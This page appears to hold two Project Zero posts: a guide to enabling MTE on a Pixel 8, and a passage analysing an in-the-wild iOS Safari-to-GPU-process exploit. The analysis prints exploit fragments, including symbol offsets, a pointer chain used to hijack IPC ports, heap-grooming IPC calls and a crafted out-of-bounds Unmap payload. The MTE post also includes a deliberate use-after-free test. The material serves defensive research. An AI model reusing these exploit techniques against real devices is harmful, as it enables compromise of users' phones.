Friday, November 3, 2023

First handset with MTE on the market

By Mark Brand, Google Project Zero

Introduction

It's finally time for me to fulfill a long-standing promise. Since I first heard about ARM's Memory Tagging Extensions, I've said (to far too many people at this point to be able to back out…) that I'd immediately switch to the first available device that supported this feature. It's been a long wait (since late 2017) but with the release of the new Pixel 8 / Pixel 8 Pro handsets, there's finally a production handset that allows you to enable MTE!

The ability of MTE to detect memory corruption exploitation at the first dangerous access is a significant improvement in diagnostic and potential security effectiveness. The availability of MTE on a production handset for the first time is a big step forward, and I think there's real potential to use this technology to make 0-day harder.

I've been running my Pixel 8 with MTE enabled since release day, and so far I haven't found any issues with any of the applications I use on a daily basis[1], or any noticeable performance issues.

Currently, MTE is only available on the Pixel as a developer option, intended for app developers to test their apps using MTE, but we can configure it to default to synchronous mode for all[2] apps and native user mode binaries. This can be done on a stock image, without bootloader unlocking or rooting required - just a couple of debugger commands. We'll do that now, but first:

Disclaimer

This is absolutely not a supported device configuration, and it's highly likely that you'll encounter issues with at least some applications crashing or failing to run correctly with MTE if you set your device up in this way.

This is how I've configured my personal Pixel 8, and so far I've not experienced any issues, but this was somewhat of a surprise to me, and I'm still waiting to see what the first app that simply won't work at all will be...

Enabling MTE on Pixel 8/Pixel 8 Pro

Enabling MTE on an Android device requires the bootloader to reserve a portion of the device memory for storing tags. This means that there are two separate places where MTE needs to be enabled - first we need to configure the bootloader to enable it, and then we need to configure the system to use it in applications.
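For reference, the per-process half of this configuration ultimately boils down to a prctl: the tagged_addr_ctrl value visible in the crash dump later in this post (0x7fff3, i.e. PR_TAGGED_ADDR_ENABLE | PR_MTE_TCF_SYNC with tag mask 0xfffe) is exactly what a sketch like the following would produce. This is only an illustration of the underlying Linux API - on Android the libc/allocator does this for you based on the system properties:

#include <stdio.h>
#include <sys/prctl.h>

// Fallback definitions for older headers (values from linux/prctl.h).
#ifndef PR_SET_TAGGED_ADDR_CTRL
#define PR_SET_TAGGED_ADDR_CTRL 55
#define PR_TAGGED_ADDR_ENABLE   (1UL << 0)
#endif
#ifndef PR_MTE_TCF_SYNC
#define PR_MTE_TCF_SYNC  (1UL << 1)
#define PR_MTE_TAG_SHIFT 3
#endif

// Ask the kernel for synchronous MTE tag checking in this process, with
// all tag values except 0 available for random tag generation.
static int enable_sync_mte(void) {
  unsigned long ctrl = PR_TAGGED_ADDR_ENABLE
                     | PR_MTE_TCF_SYNC
                     | (0xfffeUL << PR_MTE_TAG_SHIFT);
  if (prctl(PR_SET_TAGGED_ADDR_CTRL, ctrl, 0, 0, 0) != 0) {
    perror("prctl(PR_SET_TAGGED_ADDR_CTRL)");
    return -1;
  }
  return 0;
}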

First we need to follow the Android instructions to enable developer mode and USB debugging on the device.

Now we need to connect our phone to a trusted computer that has the Android debugging tools installed on it - I'm using my Linux workstation:

markbrand@markbrand$ adb devices -l

List of devices attached

XXXXXXXXXXXXXX         device usb:3-3 product:shiba model:Pixel_8 device:shiba transport_id:5

markbrand@markbrand$ adb shell

shiba:/ $ setprop arm64.memtag.bootctl memtag

shiba:/ $ setprop persist.arm64.memtag.default sync

shiba:/ $ setprop persist.arm64.memtag.app_default sync

shiba:/ $ reboot

These commands do three things. The first configures the bootloader to enable MTE at boot. The second sets the default MTE mode for native executables running on the device, and the third sets the default MTE mode for apps. An app developer can opt an individual app into MTE via its manifest, but this last system property sets the default for all apps, effectively making MTE opt-out instead of opt-in.

While on the topic of apps opting-out, it's worth noting that Chrome doesn't use the system allocator for most allocations, and instead uses PartitionAlloc. There is experimental MTE support under development, which can be enabled with some additional steps[3]. Unfortunately this currently requires setting a command-line flag which involves some security tradeoffs. We expect that Chrome will add an easier way to enable MTE support without these problems in the near future.

If we look at all of the system properties, we can see that there are a few additional properties that are related to memory tagging:

shiba:/ $ getprop | grep memtag

[arm64.memtag.bootctl]: [memtag]

[persist.arm64.memtag.app.com.android.nfc]: [off]

[persist.arm64.memtag.app.com.android.se]: [off]

[persist.arm64.memtag.app.com.google.android.bluetooth]: [off]

[persist.arm64.memtag.app_default]: [sync]

[persist.arm64.memtag.default]: [sync]

[persist.arm64.memtag.system_server]: [off]

[ro.arm64.memtag.bootctl_supported]: [1]

There are unfortunately some default exclusions which we can't override - the protections on system properties mean that on a normal production build we can't currently enable MTE for a few components: system_server and the applications related to NFC, the secure element and Bluetooth.

We want to make sure that these commands actually worked, so we'll check that now, starting with native executables:

shiba:/ $ cat /proc/self/smaps | grep mt

VmFlags: rd wr mr mw me ac mt

VmFlags: rd wr mr mw me ac mt

VmFlags: rd wr mr mw me ac mt

VmFlags: rd wr mr mw me ac mt

VmFlags: rd wr mr mw me ac mt

VmFlags: rd wr mr mw me ac mt

VmFlags: rd wr mr mw me ac mt

765bff1000-765c011000 r--s 00000000 00:12 97                             /dev/__properties__/u:object_r:arm64_memtag_prop:s0

We can see that our cat process has mappings with the mt bit set, so MTE has been enabled for the process.

Now, to check that an app without any manifest setting picks up this default, we added a little bit of code to an empty JNI project to trigger a use-after-free bug:

extern "C" JNIEXPORT jstring JNICALL

Java_com_example_mtetestapplication_MainActivity_stringFromJNI(

        JNIEnv* env,

        jobject /* this */) {

    char* ptr = strdup("test string");

  free(ptr);

  // Use-after-free when ptr is accessed below.

    return env->NewStringUTF(ptr);

}

Without MTE, it's unlikely that the application would crash running this code. I also made sure that the application manifest does not set MTE, so it will inherit the default. When we launch the application we will see whether it crashes, and whether the crash is caused by an MTE check failure!

Looking at the logcat output we can see that the cause of the crash was a synchronous MTE tag check failure (SEGV_MTESERR).

DEBUG   : *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***

DEBUG   : Build fingerprint: 'google/shiba/shiba:14/UD1A.230803.041/10808477:user/release-keys'

DEBUG   : Revision: 'MP1.0'

DEBUG   : ABI: 'arm64'

DEBUG   : Timestamp: 2023-10-24 16:56:32.092532886+0200

DEBUG   : Process uptime: 2s

DEBUG   : Cmdline: com.example.mtetestapplication

DEBUG   : pid: 24147, tid: 24147, name: testapplication  >>> com.example.mtetestapplication <<<

DEBUG   : uid: 10292

DEBUG   : tagged_addr_ctrl: 000000000007fff3 (PR_TAGGED_ADDR_ENABLE, PR_MTE_TCF_SYNC, mask 0xfffe)

DEBUG   : pac_enabled_keys: 000000000000000f (PR_PAC_APIAKEY, PR_PAC_APIBKEY, PR_PAC_APDAKEY, PR_PAC_APDBKEY)

DEBUG   : signal 11 (SIGSEGV), code 9 (SEGV_MTESERR), fault addr 0x0b000072afa9f790

DEBUG   :     x0  0000000000000001  x1  0000007fe384c2e0  x2  0000000000000075  x3  00000072aae969ac

DEBUG   :     x4  0000007fe384c308  x5  0000000000000004  x6  7274732074736574  x7  00676e6972747320

DEBUG   :     x8  0000000000000020  x9  00000072ab1867e0  x10 000000000000050c  x11 00000072aaed0af4

DEBUG   :     x12 00000072aaed0ca8  x13 31106e3dee7fb177  x14 ffffffffffffffff  x15 00000000ebad6a89

DEBUG   :     x16 0000000000000001  x17 000000722ff047b8  x18 00000075740fe000  x19 0000007fe384c2d0

DEBUG   :     x20 0000007fe384c308  x21 00000072aae969ac  x22 0000007fe384c2e0  x23 070000741fa897b0

DEBUG   :     x24 0b000072afa9f790  x25 00000072aaed0c18  x26 0000000000000001  x27 000000754a5fae40

DEBUG   :     x28 0000007573c00000  x29 0000007fe384c260

DEBUG   :     lr  00000072ab35e7ac  sp  0000007fe384be30  pc  00000072ab1867ec  pst 0000000080001000

DEBUG   : 98 total frames

DEBUG   : backtrace:

DEBUG   :       #00 pc 00000000003867ec  /apex/com.android.art/lib64/libart.so (art::(anonymous namespace)::ScopedCheck::Check(art::ScopedObjectAccess&, bool, char const*, art::(anonymous namespace)::JniValueType*) (.__uniq.99033978352804627313491551960229047428)+1636) (BuildId: a5fcf27f4a71b07dff05c648ad58e3cd)

DEBUG   :       #01 pc 000000000055e7a8  /apex/com.android.art/lib64/libart.so (art::(anonymous namespace)::CheckJNI::NewStringUTF(_JNIEnv*, char const*) (.__uniq.99033978352804627313491551960229047428.llvm.6178811259984417487)+160) (BuildId: a5fcf27f4a71b07dff05c648ad58e3cd)

DEBUG   :       #02 pc 00000000000017dc  /data/app/~~lgGoAt3gB6oojf3IWXi-KQ==/com.example.mtetestapplication-k4Yl4oMx9PEbfuvTEkjqFg==/base.apk!libmtetestapplication.so (offset 0x1000) (_JNIEnv::NewStringUTF(char const*)+36) (BuildId: f60a9970a8a46ff7949a5c8e41d0ece51e47d82c)

...

DEBUG   : Note: multiple potential causes for this crash were detected, listing them in decreasing order of likelihood.

DEBUG   : Cause: [MTE]: Use After Free, 0 bytes into a 12-byte allocation at 0x72afa9f790

DEBUG   : deallocated by thread 24147:

DEBUG   :       #00 pc 000000000005e800  /apex/com.android.runtime/lib64/bionic/libc.so (scudo::Allocator<scudo::AndroidConfig, &(scudo_malloc_postinit)>::quarantineOrDeallocateChunk(scudo::Options, void*, scudo::Chunk::UnpackedHeader*, unsigned long)+496) (BuildId: a017f07431ff6692304a0cae225962fb)

DEBUG   :       #01 pc 0000000000057ba4  /apex/com.android.runtime/lib64/bionic/libc.so (scudo::Allocator<scudo::AndroidConfig, &(scudo_malloc_postinit)>::deallocate(void*, scudo::Chunk::Origin, unsigned long, unsigned long)+212) (BuildId: a017f07431ff6692304a0cae225962fb)

DEBUG   :       #02 pc 000000000000179c  /data/app/~~lgGoAt3gB6oojf3IWXi-KQ==/com.example.mtetestapplication-k4Yl4oMx9PEbfuvTEkjqFg==/base.apk!libmtetestapplication.so (offset 0x1000) (Java_com_example_mtetestapplication_MainActivity_stringFromJNI+40) (BuildId: f60a9970a8a46ff7949a5c8e41d0ece51e47d82c)

If you just want to check that MTE has been enabled in the bootloader, there's an application on the Play Store from Google's Dynamic Tools team which you can also use. Note that this app enables MTE in async mode in its manifest, which is why it reports that MTE is not running in sync mode on all cores.

At this point, we can go back into the developer settings and disable USB debugging, since we don't want that enabled for normal day-to-day usage. We do need to leave the developer mode toggle on, since disabling that will turn off MTE again entirely on the next reboot.


Conclusion

The Pixel 8 with synchronous-MTE enabled is at least subjectively a performance and battery-life upgrade over my previous phone.

I think this is a huge improvement for the general security of the device - many zero-click attack surfaces involve large amounts of unsafe C/C++ code, whether that's WebRTC for calling, or one of the many media or image file parsing libraries. MTE is not a silver bullet for memory safety - but the release of the first production device with the ability to run almost all user-mode applications with synchronous-MTE is a huge step forward, and something that's worth celebrating!

[1] On a team member's device, there was a single MTE detection of a use-after-free bug last week. This resulted in a crash that wasn't noticed at the time, but which we later found when looking through the saved crash reports on their device. Because the allocation and free stack traces were recorded, we were able to quickly figure out the bug and report it to the application developers - the bug in this case was triggered by user gesture input and doesn't really have security impact, but it already illustrates some of the advantages of MTE.

[2] Except for se (secure element), bluetooth, nfc, and the system server, because these system apps explicitly set their individual system properties to 'off' in the Pixel system image.

[3] Enabling MTE in Chrome requires setting multiple command-line flags, which on a non-rooted Android device requires configuring Chrome to load the command line from a file in /data/local/tmp. This is potentially unsafe, so we'd not suggest doing this on a day-to-day device, but if you'd like to experiment on a test device or for fuzzing, the following commands will allow you to run Chrome with MTE enabled:

markbrand@markbrand:~$ adb shell

shiba:/ $ umask 022

shiba:/ $ echo "_ --enable-features=PartitionAllocMemoryTagging:enabled-processes/all-processes/memtag-mode/sync --disable-features=PartitionAllocPermissiveMte,KillPartitionAllocMemoryTagging" > /data/local/tmp/chrome-command-line

shiba:/ $ ls -la /data/local/tmp/chrome-command-line

-rw-r--r-- 1 shell shell 176 2023-10-25 19:14 /data/local/tmp/chrome-command-line


Having run these commands, we need to configure Chrome to read the command line file; this can be done by opening Chrome, browsing to chrome://flags#enable-command-line-on-non-rooted-devices, and setting the highlighted flag to "Enabled".

Note that unfortunately this only applies to webpages viewed using the Chrome app, and not to other Chromium-based browsers or non-browser apps that use the Chromium based Android WebView to implement their rendering.

Friday, October 13, 2023

An analysis of an in-the-wild iOS Safari WebContent to GPU Process exploit

By Ian Beer

A graph representation of the sandbox escape NSExpression payload

In April this year Google's Threat Analysis Group, in collaboration with Amnesty International, discovered an in-the-wild iPhone zero-day exploit chain being used in targeted attacks delivered via malicious link. The chain was reported to Apple under a 7-day disclosure deadline and Apple released iOS 16.4.1 on April 7, 2023 fixing CVE-2023-28206 and CVE-2023-28205.

Over the last few years Apple has been hardening the Safari WebContent (or "renderer") process sandbox attack surface on iOS, recently removing the ability for the WebContent process to access GPU-related hardware directly. Access to graphics-related drivers is now brokered via a GPU process which runs in a separate sandbox.

Analysis of this in-the-wild exploit chain reveals the first known case of attackers exploiting the Safari IPC layer to "hop" from WebContent to the GPU process, adding an extra link to the exploit chain (CVE-2023-32409).

On the surface this is a positive sign: clear evidence that the renderer sandbox was hardened sufficiently that (in this isolated case at least) the attackers needed to bundle an additional, separate exploit. Project Zero has long advocated for attack-surface reduction as an effective tool for improving security and this would seem like a clear win for that approach.

On the other hand, upon deeper inspection, things aren't quite so rosy. Retroactively sandboxing code which was never designed with compartmentalization in mind is rarely simple to do effectively. In this case the exploit targeted a very basic buffer overflow vulnerability in unused IPC support code for a disabled feature - effectively new attack surface which exists only because of the introduced sandbox. A simple fuzzer targeting the IPC layer would likely have found this vulnerability in seconds.

Nevertheless, it remains the case that attackers will still need to exploit this extra link in the chain each time to reach the GPU driver kernel attack surface. A large part of this writeup is dedicated to analysis of the NSExpression-based framework the attackers developed to ease this and vastly reduce their marginal costs.

Setting the stage

After gaining native code execution by exploiting a JavaScriptCore Garbage Collection vulnerability, the attackers perform a find-and-replace on a large ArrayBuffer in JavaScript containing a Mach-O binary to link a number of platform- and version-dependent symbol addresses and structure offsets using hardcoded values:

// find and rebase symbols for current target and ASLR slide:

    dt: {

        ce: false,

        ["16.3.0"]: {

            _e: 0x1ddc50ed1,

            de: 0x1dd2d05b8,

            ue: 0x19afa9760,

            he: 1392,

            me: 48,

            fe: 136,

            pe: 0x1dd448e70,

            ge: 305,

            Ce: 0x1dd2da340,

            Pe: 0x1dd2da348,

            ye: 0x1dd2d45f0,

            be: 0x1da613438,

...

        ["16.3.1"]: {

            _e: 0x1ddc50ed1,

            de: 0x1dd2d05b8,

            ue: 0x19afa9760,

            he: 1392,

            me: 48,

            fe: 136,

            pe: 0x1dd448e70,

            ge: 305,

            Ce: 0x1dd2da340,

            Pe: 0x1dd2da348,

            ye: 0x1dd2d45f0,

            be: 0x1da613438,

// mach-o Uint32Array:

xxxx = new Uint32Array([0x77a9d075,0x88442ab6,0x9442ab8,0x89442ab8,0x89442aab,0x89442fa2,

// deobfuscate xxx

...

// find-and-replace symbols:

xxxx.on(new m("0x2222222222222222"), p.Le);

xxxx.on(new m("0x3333333333333333"), Gs);

xxxx.on(new m("0x9999999999999999"), Bs);

xxxx.on(new m("0x8888888888888888"), Rs);

xxxx.on(new m("0xaaaaaaaaaaaaaaaa"), Is);

xxxx.on(new m("0xc1c1c1c1c1c1c1c1"), vt);

xxxx.on(new m("0xdddddddddddddddd"), p.Xt);

xxxx.on(new m("0xd1d1d1d1d1d1d1d1"), p.Jt);

xxxx.on(new m("0xd2d2d2d2d2d2d2d2"), p.Ht);

The initial Mach-O which this loads has a fairly small __TEXT (code) segment and is itself in fact a Mach-O loader, which loads another binary from a segment called __embd. It's this inner Mach-O which this analysis will cover.

Part I - Mysterious Messages

Looking through the strings in the binary there's a collection of familiar IOKit userclient matching strings referencing graphics drivers:

"AppleM2ScalerCSCDriver",0

"IOSurfaceRoot",0

"AGXAccelerator",0

But following the cross references to "AGXAccelerator" (which opens userclients for the GPU) this string never gets passed to IOServiceOpen. Instead, all references to it end up here (the binary is stripped so all function names are my own):

kern_return_t

get_a_user_client(char *matching_string,

                  u32 type,

                  void* s_out) {

  kern_return_t ret;

  struct uc_reply_msg;

  mach_port_name_t reply_port;

  struct msg_1 msg;

  reply_port = 0;

  mach_port_allocate(mach_task_self_,

                     MACH_PORT_RIGHT_RECEIVE,

                     &reply_port);

  memset(&msg, 0, sizeof(msg));

  msg.hdr.msgh_bits = 0x1413;

  msg.hdr.msgh_remote_port = a_global_port;

  msg.hdr.msgh_local_port = reply_port;

  msg.hdr.msgh_id = 5;

  msg.hdr.msgh_size = 200;

  msg.field_a = 0;

  msg.type = type;

  __strcpy_chk(msg.matching_str, matching_string, 128LL);

  ret = mach_msg_send(&msg.hdr);

...

  // return a port read from the reply message via s_out

Whilst it's not unusual for a userclient matching string to end up inside a mach message (plenty of exploits will include or generate their own MIG serialization code for interacting with IOKit) this isn't a MIG message.

Trying to track down the origin of the port right to which this message was sent was non-trivial; there was clearly more going on. My guess was that this must be communicating with something else, likely some other part of the exploit. The question was: what other part?

Down the rabbit hole

At this point I started going through all the cross-references to the imported symbols which could send or receive mach messages, hoping to find the other end of this IPC. This just raised more questions than it answered.

In particular, there were a lot of cross-references to a function sending a variable-sized mach message with a msgh_id of 0xDBA1DBA.

There is exactly one hit on Google for that constant:

A screenshot of a Google search result page with one result

Ignoring Google's helpful advice that maybe I wanted to search for "cake recipes" instead of this hex constant and following the single result leads to this snippet on opensource.apple.com in ConnectionCocoa.mm:

namespace IPC {

static const size_t inlineMessageMaxSize = 4096;

// Arbitrary message IDs that do not collide with Mach notification messages (used my initials).

constexpr mach_msg_id_t inlineBodyMessageID = 0xdba0dba;

constexpr mach_msg_id_t outOfLineBodyMessageID = 0xdba1dba;

This is a constant used in Safari IPC messages!

Whilst Safari has had a separate networking process for a long time it's only recently started to isolate GPU and graphics-related functionality into a GPU process. Knowing this, it's fairly clear what must be going on here: since the renderer process can presumably no longer open the AGXAccelerator userclients, the exploit is somehow going to have to get the GPU process to do that. This is likely the first case of an in-the-wild iOS exploit targeting Safari's IPC layer.

The path less trodden

Googling for info on Safari IPC doesn't yield many results (apart from some very early Project Zero vulnerability reports) and looking through the WebKit source reveals heavy use of generated code and C++ operator overloading, neither of which are conducive to quickly getting a feel for the binary-level structure of the IPC messages.

But the high-level structure is easy enough to figure out. As we can see from the code snippet above, IPC messages containing the msgh_id value 0xdba1dba send their serialized message body as an out-of-line descriptor. That serialized body always starts with a common header defined in the IPC namespace as:

void Encoder::encodeHeader()

{

  *this << defaultMessageFlags;

  *this << m_messageName;

  *this << m_destinationID;

}

The flags and name fields are both 16-bit values and destinationID is 64 bits. The serialization uses natural alignment so there's 4 bytes of padding between the name and destinationID:

Diagram showing the in-memory layout of a Safari IPC mach message with message header then serialized payload pointed to by an out-of-line descriptor
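In struct form (field names assumed here, not actual WebKit declarations), that 16-byte header looks like:

#include <cstdint>

// Sketch of the serialized header layout, per the encodeHeader() snippet.
struct SerializedIPCHeader {
  uint16_t flags;          // defaultMessageFlags
  uint16_t messageName;    // 16-bit message name
  uint32_t padding;        // natural alignment before the 64-bit field
  uint64_t destinationID;
};
static_assert(sizeof(SerializedIPCHeader) == 16, "header is 16 bytes");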

It's easy enough to enumerate all the functions in the exploit which serialize these Safari IPC messages. None of them hardcode the messageName values; instead there's a layer of indirection indicating that the messageName values aren't stable across builds. The exploit uses the device's uname string, product and OS version to choose the correct hardcoded table of messageName values.

The IPC::description function in the iOS shared cache maps messageName values to IPC names:

const char * IPC::description(unsigned int messageName)

{

  if ( messageName > 0xC78 )

    return "<invalid message name>";

  else

    return off_1D61ED988[messageName];

}

The size of the bounds check gives you an idea of the size of the IPC attack surface - that's over 3000 IPC messages between all pairs of communicating processes.
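That also means the whole table can be recovered mechanically for any given build - a sketch, assuming you can call (or have re-implemented) the IPC::description function above:

#include <cstdio>

// Dump the messageName -> human-readable-name table for this build.
void dump_ipc_message_names() {
  for (unsigned messageName = 0; messageName <= 0xC78; ++messageName)
    printf("0x%x: %s\n", messageName, IPC::description(messageName));
}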

Using the table in the shared cache to map the message names to human-readable strings we can see the exploit uses the following 24 IPC messages:

0x39:  GPUConnectionToWebProcess_CreateRemoteGPU

0x3a:  GPUConnectionToWebProcess_CreateRenderingBackend

0x9B5: InitializeConnection

0x9B7: ProcessOutOfStreamMessage

0xBA2: RemoteAdapter_RequestDevice

0xBA5: RemoteBuffer_MapAsync

0x271: RemoteBuffer_Unmap

0xBA6: RemoteCDMFactoryProxy_CreateCDM

0x2A2: RemoteDevice_CreateBuffer

0x2C7: RemoteDisplayListRecorder_DrawNativeImage

0x2D4: RemoteDisplayListRecorder_FillRect

0x2DF: RemoteDisplayListRecorder_SetCTM

0x2F3: RemoteGPUProxy_WasCreated

0xBAD: RemoteGPU_RequestAdapter

0x402: RemoteMediaRecorderManager_CreateRecorder

0xA85: RemoteMediaRecorderManager_CreateRecorderReply

0x412: RemoteMediaResourceManager_RedirectReceived

0x469: RemoteRenderingBackendProxy_DidInitialize

0x46D: RemoteRenderingBackend_CacheNativeImage

0x46E: RemoteRenderingBackend_CreateImageBuffer

0x474: RemoteRenderingBackend_ReleaseResource

0x9B8: SetStreamDestinationID

0x9B9: SyncMessageReply

0x9BA: Terminate

This list of IPC names solidifies the theory that this exploit is targeting a GPU process vulnerability.

Finding a way

The destination port which these messages are being sent to comes from a global variable which looks like this in the raw Mach-O when loaded into IDA:

__data:000000003E4841C0 dst_port DCQ 0x4444444444444444

I mentioned earlier that the outer JS which loaded the exploit binary first performed a find-and-replace using patterns like this. Here's the snippet computing this particular value:

 let Ls = o(p.Ee);

 let Ds = o(Ls.add(p.qe));

 let Ws = o(Ds.add(p.$e));

 let vs = o(Ws.add(p.Ze));

 jBHk.on(new m("0x4444444444444444"), vs);

Replacing all the constants we can see it's following a pointer chain from a hardcoded offset inside the shared cache:

 let Ls = o(0x1dd453458);

 let Ds = o(Ls.add(256));

 let Ws = o(Ds.add(24));

 let vs = o(Ws.add(280));

At the initial symbol address (0x1dd453458) we find the WebContent process's singleton process object which maintains its state:

WebKit:__common:00000001DD453458 WebKit::WebProcess::singleton(void)::process

Following these offsets, we can see that they walk this pointer chain to find the mach port right representing the WebProcess's connection to the GPU process:

process->m_gpuProcessConnection->m_connection->m_sendPort

The exploit also reads the m_receivePort field allowing it to set up bidirectional communication with the GPU process and fully imitate the WebContent process.
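With the constants substituted, the JS snippet above is equivalent to the following pointer chase (a sketch: read64 stands in for the exploit's renderer-side arbitrary read, and all offsets are the build-specific 16.3.x values):

#include <cstdint>

// Sketch of the pointer chase; read64() is a stand-in for the exploit's
// arbitrary-read primitive and the offsets vary per build.
uint64_t find_gpu_process_send_port() {
  uint64_t process    = read64(0x1dd453458);   // WebProcess::singleton()::process
  uint64_t gpuConn    = read64(process + 256); // ->m_gpuProcessConnection
  uint64_t connection = read64(gpuConn + 24);  // ->m_connection
  return read64(connection + 280);             // ->m_sendPort
}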

Defining features

WebKit defines its IPC messages using a simple custom DSL in files ending with the suffix .messages.in. These definitions look like this:

messages -> RemoteRenderPipeline NotRefCounted Stream {

  void GetBindGroupLayout(uint32_t index, WebKit::WebGPUIdentifier identifier);

  void SetLabel(String label)

}

These are parsed by this Python script to generate the necessary boilerplate code to serialize and deserialize the messages. Types which wish to cross the serialization boundary define ::encode and ::decode methods:

void encode(IPC::Encoder&) const;

static WARN_UNUSED_RETURN bool decode(IPC::Decoder&, T&);

There are a number of macros defining these coders for the built-in types.
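As a purely illustrative sketch (not actual WebKit code), a type made serializable in this way looks something like:

#include <cstdint>

// Illustrative only: a simple type crossing the IPC boundary by
// providing the encode/decode pair described above.
struct ExampleSize {
  uint32_t width { 0 };
  uint32_t height { 0 };

  void encode(IPC::Encoder& encoder) const {
    encoder << width << height;
  }

  static bool decode(IPC::Decoder& decoder, ExampleSize& result) {
    return decoder.decode(result.width) && decoder.decode(result.height);
  }
};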

A pattern appears

Renaming the methods in the exploit which send IPC messages and reversing some more of their arguments a clear pattern emerges:

image_buffer_base_id = rand();

for (i = 0; i < 34; i++) {

  IPC_RemoteRenderingBackend_CreateImageBuffer(

    image_buffer_base_id + i);

}

semaphore_signal(semaphore_b);

remote_device_buffer_id_base = rand();

IPC_RemoteRenderingBackend_ReleaseResource(

  image_buffer_base_id + 2);

usleep(4000u);

IPC_RemoteDevice_CreateBuffer_16k(remote_device_buffer_id_base);

usleep(4000u);

IPC_RemoteRenderingBackend_ReleaseResource(

  image_buffer_base_id + 4);

usleep(4000u);

IPC_RemoteDevice_CreateBuffer_16k(remote_device_buffer_id_base + 1);

usleep(4000u);

IPC_RemoteRenderingBackend_ReleaseResource(

  image_buffer_base_id + 6);

usleep(4000u);

IPC_RemoteDevice_CreateBuffer_16k(remote_device_buffer_id_base + 2);

usleep(4000u);

IPC_RemoteRenderingBackend_ReleaseResource(

  image_buffer_base_id + 8);

usleep(4000u);

IPC_RemoteDevice_CreateBuffer_16k(remote_device_buffer_id_base + 3);

usleep(4000u);

IPC_RemoteRenderingBackend_ReleaseResource(

  image_buffer_base_id + 10);

usleep(4000u);

IPC_RemoteDevice_CreateBuffer_16k(remote_device_buffer_id_base + 4);

usleep(4000u);

IPC_RemoteRenderingBackend_ReleaseResource(

  image_buffer_base_id + 12);

usleep(4000u);

IPC_RemoteDevice_CreateBuffer_16k(remote_device_buffer_id_base + 5);

usleep(4000u);

semaphore_signal(semaphore_b);

This creates 34 RemoteRenderingBackend ImageBuffer objects then releases 6 of them and likely reallocates the holes via the RemoteDevice::CreateBuffer IPC (passing a size of 16k.)

Diagram showing a pattern of alternating allocations

This looks a lot like heap manipulation to place certain objects next to each other in preparation for a buffer overflow. The part which is slightly odd is how simple it seems - there's no evidence of a complex heap-grooming approach here. The diagram above was just my guess at what was probably happening, and reading through the code implementing the IPCs it was not at all obvious where these buffers were actually being allocated.

A strange argument

I started to reverse engineer the structure of the IPC messages which looked most relevant, looking for anything which seemed out of place. One pair of messages seemed especially suspicious:

RemoteBuffer::MapAsync

RemoteBuffer::Unmap

These are two messages sent from the Web process to the GPU process, defined in GPUProcess/graphics/WebGPU/RemoteBuffer.messages.in and used in the WebGPU implementation.

Whilst the IPC machinery implementing WebGPU exists in Safari, the user-facing JavaScript API isn't present. It used to be available in Apple's Safari Technology Preview builds, but it hasn't been enabled there for some time. The W3C WebGPU group's GitHub wiki suggests that when enabling WebGPU support in Safari users should "avoid leaving it enabled when browsing the untrusted web."

The IPC definitions for the RemoteBuffer look like this:

messages -> RemoteBuffer NotRefCounted Stream

{

  void MapAsync(PAL::WebGPU::MapModeFlags mapModeFlags,

                PAL::WebGPU::Size64 offset,

                std::optional<PAL::WebGPU::Size64> size)

        ->

        (std::optional<Vector<uint8_t>> data) Synchronous

    void Unmap(Vector<uint8_t> data)

}

These WebGPU resources explain the concepts behind these APIs. They're intended to manage sharing buffers between the GPU and CPU:

MapAsync moves ownership of a buffer from the GPU to the CPU to allow the CPU to manipulate it without racing the GPU.

Unmap then signals that the CPU is done with the buffer and ownership can return to the GPU.

In practice the MapAsync IPC returns a copy of the current contents of the WebGPU buffer (at the specified offset) to the CPU as a Vector<uint8_t>. Unmap then passes the new contents back to the GPU, also as a Vector<uint8_t>.
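In other words, the intended benign round trip looks something like this (a sketch with made-up wrapper names):

// Sketch of the intended round trip (wrapper names are made up):
Vector<uint8_t> copy = ipcMapAsync(bufferID,
                                   MapMode::Write,
                                   /* offset */ 0,
                                   /* size   */ 0x4000); // GPU -> CPU copy
copy[0] = 0x41;                      // CPU-side edit of the copied bytes
ipcUnmap(bufferID, WTFMove(copy));   // hand ownership (and bytes) back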

You might be able to see where this is going...

Buffer lifecycles

RemoteBuffers are created on the WebContent side using the RemoteDevice::CreateBuffer IPC:

messages -> RemoteDevice NotRefCounted Stream {

  void Destroy()

  void CreateBuffer(WebKit::WebGPU::BufferDescriptor descriptor,

                    WebKit::WebGPUIdentifier identifier)

This takes a description of the buffer to create and an identifier to name it. All the calls to this IPC in the exploit used a fixed size of 0x4000 which is 16KB, the size of a single physical page on iOS.

The first sign that these IPCs were important was the rather strange arguments passed to MapAsync in some places:

IPC_RemoteBuffer_MapAsync(remote_device_buffer_id_base + m,

                          0x4000,

                          0);

As shown above, this IPC takes a buffer id, an offset and a size to map - in that order. So this IPC call is requesting a mapping of the buffer with id remote_device_buffer_id_base + m at offset 0x4000 (the very end) of size 0 (ie nothing.)

Directly after this they call IPC_RemoteBuffer_Unmap passing a vector of 40 bytes as the "new content":

b[0] = 0x7F6F3229LL;

b[1] = 0LL;

b[2] = 0LL;

b[3] = 0xFFFFLL;

b[4] = arg_val;

return IPC_RemoteBuffer_Unmap(dst, b, 40LL);

Buffer origins

I spent considerable time trying to figure out the origin of the underlying pages backing the RemoteBuffer buffer allocations. Statically following the code from WebKit you eventually end up in the userspace side of the AGX GPU family drivers, which are written in Objective-C. There are plenty of methods with names like

id __cdecl -[AGXG15FamilyDevice newBufferWithLength:options:]

implying responsibility for buffer allocations - but there's no malloc, mmap or vm_allocate in sight.

Using dtrace to dump userspace and kernel stack traces while experimenting with code using the GPU on an M1 macbook, I eventually figured out that this buffer is allocated by the GPU driver itself, which then maps that memory into userspace:

IOMemoryDescriptor::createMappingInTask

IOBufferMemoryDescriptor::initWithPhysicalMask

com.apple.AGXG13X`AGXAccelerator::

                    createBufferMemoryDescriptorInTaskWithOptions

com.apple.iokit.IOGPUFamily`IOGPUSysMemory::withOptions

com.apple.iokit.IOGPUFamily`IOGPUResource::newResourceWithOptions

com.apple.iokit.IOGPUFamily`IOGPUDevice::new_resource

com.apple.iokit.IOGPUFamily`IOGPUDeviceUserClient::s_new_resource

kernel.release.t6000`0xfffffe00263116cc+0x80

kernel.release.t6000`0xfffffe00263117bc+0x28c

kernel.release.t6000`0xfffffe0025d326d0+0x184

kernel.release.t6000`0xfffffe0025c3856c+0x384

kernel.release.t6000`0xfffffe0025c0e274+0x2c0

kernel.release.t6000`0xfffffe0025c25a64+0x1a4

kernel.release.t6000`0xfffffe0025c25e80+0x200

kernel.release.t6000`0xfffffe0025d584a0+0x184

kernel.release.t6000`0xfffffe0025d62e08+0x5b8

kernel.release.t6000`0xfffffe0025be37d0+0x28

                 ^

--- kernel stack |   | userspace stack ---

                     v
